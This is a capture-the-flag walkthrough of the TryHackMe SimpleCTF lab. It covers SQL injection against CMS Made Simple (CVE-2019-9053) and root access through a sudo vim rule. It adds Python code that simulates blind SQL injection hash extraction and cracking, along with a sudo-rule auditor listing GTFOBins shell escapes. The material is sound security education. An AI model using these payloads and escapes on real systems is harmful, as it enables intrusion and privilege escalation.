Uploaded by mwaivictor04

TryHackMe SimpleCTF Walkthrough

Introduction
This was a simple Linux box. It involved exploiting an SQL injection vulnerability in CMS Made Simple to recover a user's credentials and gain initial access over SSH, then rooting the box through a sudo rule that allowed vim to run as root.

Enumeration
The first step was to ping the machine to check that it is reachable and that it allows ICMP traffic (a box that blocks ICMP can still have open ports, so no reply does not mean the host is down).

ping <ip>

Afterwards I ran an nmap scan with the following flags:

-sCV combines -sV (service and version detection on each open port) with -sC (the default NSE script set run against each detected service).
--script vuln additionally runs the NSE scripts in the vuln category, which check the discovered services for known vulnerabilities. These scripts are slow and noisy, so on a real engagement run them only where that is acceptable.

nmap -sCV --script vuln <ip>

As shown below, the scan identified three open ports and their services:
21 ftp
80 http
2222 ssh (note the non-standard port; it matters later when logging in)
Enumerating HTTP
On opening the webpage, I get the following

Doing further enumeration with gobuster, I found other pages:

/simple, which redirects to another page. Before following it I looked at what was exposed for web crawlers: /robots.txt had some interesting entries but proved to be a decoy.
/openemr-5_0_1_3, which returned a 404 page that disclosed the Apache version.

Following the /simple result from the gobuster enumeration, we are met with a CMS Made Simple web page.

Scrolling down the page, the CMS version is disclosed in the footer.


CMS Made Simple version 2.2.8.
With the CMS version disclosed, we can search online for exploits affecting it.

From the search, this version is vulnerable to an unauthenticated blind SQL injection, CVE-2019-9053, which lets an attacker read data such as user password hashes out of the CMS database.

From Exploit Database I downloaded the public exploit, ran it against the site, and got the following details.

The exploit runs under Python 2. To see the options the exploit accepts:

I used the second usage example, which also cracks the recovered password hash directly against a wordlist.
The wordlist I used was the one provided as a hint in the question.
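The two phases the exploit performs, reading a user's salt and password hash out of the database through the injection and then cracking that hash against the hint wordlist, as an added Python 3 example. This is not the Exploit-DB script and not code from the original walkthrough. Everything in it is a constructed stand-in: the table layout, the salt, the four-word wordlist and the injectable query are made up for the example, and the oracle is boolean-based against an in-memory SQLite table, whereas the real CVE-2019-9053 exploit is time-based against the News module over HTTP. The md5(salt + password) construction is assumed to be what the exploit's cracking mode checks. The hardened query alongside it shows why a bound parameter stops the same payload.

```python
import hashlib
import sqlite3

# Constructed values for this example only; the real salt and hash are read
# from the target by the exploit, and the real wordlist is the room's hint.
SALT = "e7a4f6b2"                                       # hypothetical site salt
WORDLIST = ["password", "letmein", "secret", "123456"]  # hypothetical hint wordlist
USER = "mitch"


def build_db():
    """In-memory stand-in for the CMS user table. The stored value is
    md5(salt + password), the construction assumed for the cracking step."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cms_users (user_id INTEGER, username TEXT, password TEXT)")
    digest = hashlib.md5((SALT + "secret").encode()).hexdigest()
    conn.execute("INSERT INTO cms_users VALUES (1, ?, ?)", (USER, digest))
    return conn


def vulnerable_count(conn, idlist):
    """The bug class: untrusted input pasted straight into the SQL text."""
    sql = "SELECT COUNT(*) FROM cms_users WHERE user_id IN (" + idlist + ")"
    return conn.execute(sql).fetchone()[0]


def hardened_count(conn, user_id):
    """Same lookup with a bound parameter: the input is data, never SQL."""
    sql = "SELECT COUNT(*) FROM cms_users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchone()[0]


def extract_hash(oracle, username=USER, max_len=40):
    """Boolean-based blind extraction. oracle(payload) -> True when the injected
    condition holds. Each character costs about seven queries (binary search on
    its code point). Past the end of the string substr() yields '' and unicode()
    yields NULL, so the search converges to 0, which terminates the loop."""
    recovered = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = (
                "1) AND (SELECT unicode(substr(password,%d,1)) FROM cms_users "
                "WHERE username='%s') > %d --" % (pos, username, mid)
            )
            if oracle(payload):   # character code point is greater than mid
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        recovered += chr(lo)
    return recovered


def crack_salted_md5(salt, target, wordlist):
    """Dictionary attack: hash each candidate with the recovered salt."""
    for word in wordlist:
        if hashlib.md5((salt + word).encode()).hexdigest() == target:
            return word
    return None


def run_attack(hardened=False):
    """Returns (recovered_hash, cracked_password) against either query form."""
    conn = build_db()
    count = hardened_count if hardened else vulnerable_count
    oracle = lambda payload: count(conn, payload) > 0
    digest = extract_hash(oracle)
    cracked = crack_salted_md5(SALT, digest, WORDLIST) if digest else None
    return digest, cracked


if __name__ == "__main__":
    print(run_attack())                # leaks the 32-char hash and cracks it to 'secret'
    print(run_attack(hardened=True))   # ('', None): the bound parameter defeats the payload
```

The trailing `--` in the payload comments out whatever the application appends after the injected input, which is why the closing parenthesis in `vulnerable_count` never breaks the query. Against `hardened_count` the identical payload is compared as a string to an integer column and simply matches nothing.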

Enumerating FTP
Since port 21 was open, I tried an anonymous login, and surprisingly it was allowed.
Through the anonymous session I looked around and found the pub directory. Changing into it and
listing the files, I found a text file, which I downloaded to my machine. It contained the following note.

Interesting. From the web enumeration and the exploit we used, the user who reused the weak password
was mitch.

Logging in over SSH on port 2222 as user mitch with the password secret works.

From there I got the user flag, as evidence of a foothold on the system.

Privilege escalation
For privilege escalation I ran sudo -l to see which commands user mitch is allowed to run as root.
Researching on GTFOBins how to get a root shell through vim, I got the following.

However, the one-line command from GTFOBins did not work immediately. What I did instead was run sudo vim first to open vim as root, then execute :!/bin/bash from inside it to get a root shell, as shown above.

From there I accessed /root and got the root flag.
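The check behind this step, turning `sudo -l` output into a list of binaries with a known GTFOBins escape, as an added Python 3 example that is not part of the original walkthrough. The `sudo -l` text below is a constructed sample, not the room's real output; the escape strings are the sudo-context one-liners as documented on GTFOBins for a handful of common binaries, and the interactive route the walkthrough used for vim (open it with sudo, then `:!/bin/bash`) is equivalent to the `-c` form listed here. The rule-line regex covers the common `(runas) TAG: /path, /path` format only.

```python
import re
from collections import namedtuple

# Constructed sample of `sudo -l` output for this example (not the room's real output).
SAMPLE_SUDO_L = """\
Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root : root) /usr/bin/less, /usr/bin/find
    (ALL) /bin/ls
"""

# Sudo-context shell escapes as documented on GTFOBins. Only these binaries are
# flagged; anything else in the rules still needs a manual look.
GTFOBINS_SUDO = {
    "vim":    "sudo vim -c ':!/bin/sh'",
    "vi":     "sudo vi -c ':!/bin/sh'",
    "less":   "sudo less /etc/profile  (then type !/bin/sh)",
    "find":   "sudo find . -exec /bin/sh \\; -quit",
    "awk":    "sudo awk 'BEGIN {system(\"/bin/sh\")}'",
    "python": "sudo python -c 'import os; os.system(\"/bin/sh\")'",
}

Finding = namedtuple("Finding", "runas nopasswd command escape")

# "(root : root) NOPASSWD: /usr/bin/vim, /usr/bin/less"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)\s*$")


def audit_sudo_output(text):
    """Parse the rule lines that follow the 'may run the following commands'
    header and pair every allowed command with its GTFOBins escape, if any."""
    findings = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()      # "root : root" -> root
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            name = cmd.split()[0].rsplit("/", 1)[-1]         # "/usr/bin/vim" -> vim
            findings.append(Finding(runas, nopasswd, cmd, GTFOBINS_SUDO.get(name)))
    return findings


def escalation_paths(text):
    """Only the findings that give a root shell straight from the GTFOBins table."""
    return [f for f in audit_sudo_output(text) if f.escape and f.runas in ("root", "ALL")]


if __name__ == "__main__":
    for f in escalation_paths(SAMPLE_SUDO_L):
        tag = "(no password needed)" if f.nopasswd else "(user password required)"
        print(f.command, "->", f.escape, tag)
```

NOPASSWD is worth recording separately: a rule without it still escalates, but only if you already hold the user's password, which in this room you do.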

Conclusion
This room was an easy box for any CTF beginner. The lessons from it are to keep the software and technologies in use up to date (the CMS version here had a public, unauthenticated exploit), to use stronger passwords, and not to reuse the same password across accounts: a password recovered from the web application was accepted for SSH too.

Below is a proof of my completion of the room.
